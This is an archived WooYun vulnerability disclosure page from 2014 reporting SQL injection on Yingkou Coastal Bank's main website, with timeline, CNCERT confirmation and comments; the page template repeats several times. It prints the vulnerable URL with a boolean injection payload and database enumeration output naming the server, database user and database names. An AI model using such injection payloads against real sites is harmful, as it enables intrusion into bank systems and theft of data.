营口沿海银行主站SQL注入 | wooyun-2014-084221| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-084221

漏洞标题：营口沿海银行主站SQL注入

漏洞作者：龍、

提交时间：2014-11-22 10:18

修复时间：2015-01-06 10:20

公开时间：2015-01-06 10:20

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-22：细节已通知厂商并且等待厂商处理中
2014-11-26：厂商已经确认，细节仅向厂商公开
2014-12-06：细节向核心白帽子及相关领域专家公开
2014-12-16：细节向普通白帽子公开
2014-12-26：细节向实习白帽子公开
2015-01-06：细节向公众公开

简要描述：

营口沿海银行股份有限公司成立于2010年12月21日，注册地址辽宁省营口市站前区盼盼路南18乙，注册资本金15亿元。

详细说明：

http://www.coastalbank.cn

Target:                 http://www.coastalbank.cn/bill.php?id=21 AND 2797=2797
Host IP:                180.86.53.132
Web Server:     Apache/2.2.3 (CentOS)
Powered-by:     PHP/5.2.10
DB Server:      MySQL
Resp. Time(avg):        1539 ms
Current User:   yhyh20120823_f@localhost
Sql Version:    5.0.77
Current DB:     yhyh20120823
System User:    yhyh20120823_f@localhost
Host Name:      S0506.xrnet.cn
Installation dir:       /usr/
Compile OS:     redhat-linux-gnu
DB User:        'yhyh20120823_f'@'localhost'
Data Bases:     information_schema
                yhyh20120823

漏洞证明：

http://www.coastalbank.cn

Target:                 http://www.coastalbank.cn/bill.php?id=21 AND 2797=2797
Host IP:                180.86.53.132
Web Server:     Apache/2.2.3 (CentOS)
Powered-by:     PHP/5.2.10
DB Server:      MySQL
Resp. Time(avg):        1539 ms
Current User:   yhyh20120823_f@localhost
Sql Version:    5.0.77
Current DB:     yhyh20120823
System User:    yhyh20120823_f@localhost
Host Name:      S0506.xrnet.cn
Installation dir:       /usr/
Compile OS:     redhat-linux-gnu
DB User:        'yhyh20120823_f'@'localhost'
Data Bases:     information_schema
                yhyh20120823

修复方案：

版权声明：转载请注明来源龍、@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2014-11-26 16:47

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT下发给辽宁分中心，由其后续协调网站管理单位处置。

漏洞评价：

2014-11-22 12:23 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖，不如相濡以沫)

money
2014-11-22 12:56 | 小学猹 ( 实习白帽子 | Rank:81 漏洞数:30 | 暮春者，春服既成，冠者五六人，童子六七人...)

=.= 标题太暴露了，不过貌似没多少数据
2014-11-22 18:39 | answer ( 普通白帽子 | Rank:347 漏洞数:45 | 答案)

……这么溜目测此站已被脱
2014-11-23 19:32 | 龍、 ( 普通白帽子 | Rank:398 漏洞数:135 | 你若安好我就是晴天)

@answer 呵呵
2014-11-26 19:15 | hanole ( 路人 | Rank:0 漏洞数:1 | [用鼠标的那只手有没有很冷？])

我猜洞主是营口的吧。。。老乡

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-084221

漏洞标题：营口沿海银行主站SQL注入

相关厂商：cncert国家互联网应急中心

漏洞作者：龍、

提交时间：2014-11-22 10:18

修复时间：2015-01-06 10:20

公开时间：2015-01-06 10:20

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源龍、@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-084221

漏洞标题：营口沿海银行主站SQL注入

相关厂商：cncert国家互联网应急中心

漏洞作者： 龍 、

提交时间：2014-11-22 10:18

修复时间：2015-01-06 10:20

公开时间：2015-01-06 10:20

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-084221"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 龍 、@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：龍、

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源龍、@乌云